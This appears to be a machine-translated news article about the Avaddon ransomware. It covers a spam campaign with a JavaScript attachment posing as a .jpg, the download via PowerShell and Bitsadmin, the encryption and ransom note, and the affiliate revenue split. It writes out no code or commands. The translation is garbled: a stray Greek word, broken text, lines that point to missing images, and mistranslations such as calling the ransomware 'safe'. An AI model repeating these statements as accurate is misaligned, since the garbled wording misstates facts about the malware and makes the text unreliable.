The new Avaddon Ransomware comes to life in a huge spam campaign that targets users around the world.
Avaddon was released earlier this month and recruits active hackers and malware distributors to spread ransomware in every possible way.
As his first known attack, Avaddon Ransomware is being distributed on a spam campaign reminiscent of the February Nemty Ransomware Love Letter campaign.
Do you like my photograph;
In a related report, the cyber security company Appriver said that Phorphiex / Trik Botnet distributes malicious email.
This campaign is not small, as AppRiver security researcher David Picket told us, that they had blocked more than 300.000 emails in a short time.
This means that what appears to the recipient will be just a .jpg file, as shown below.
When executed, the attached JS will launch a PowerShell and Bitsadmin command to perform λήψη of Avaddon ransomware that can be run in the% Temp% folder and run it.
In the sample tested by BleepingComputer, once run, ransomware will search for encryption data and add the .avdn extension to encrypted files.
In each folder, a notebook called [id] -readme.html will be created. This ransom note contains a link to the TOR website and a unique one victim identification used to link to the website.
This TOR payment website includes the ransom amount and instructions on how to pay for a decryptor.
Unfortunately, Michael Gillespie analyzed the ransomware and said it was safe and could not be decrypted for free.
In ads published on Russian-language hacking forums earlier this month, Avaddon said it was a new Ransomware-as-an-Affiliate (RaaS) program.
This means that the ransomware creator is responsible for the development of the malware and the operation of the payment website. TOR.
Participants in the program are responsible for the distribution of ransomware via spam, compromise networks and exploit kits.
Under this agreement, Avaddon pays partners 65% of the ransom they bring and Avaddon providers will receive 35%. Larger partners are usually able to negotiate a higher share of revenue depending on the size of their attacks.
As is typical with RaaS programs, Avaddon has a set of rules that partners must follow when distributing ransomware. The most common rule is that they cannot target victims in the Commonwealth of Independent States (CIS).
Now that the creators of Avaddon have started accepting applications, we should expect to see an increase in distribution and more advanced attacks.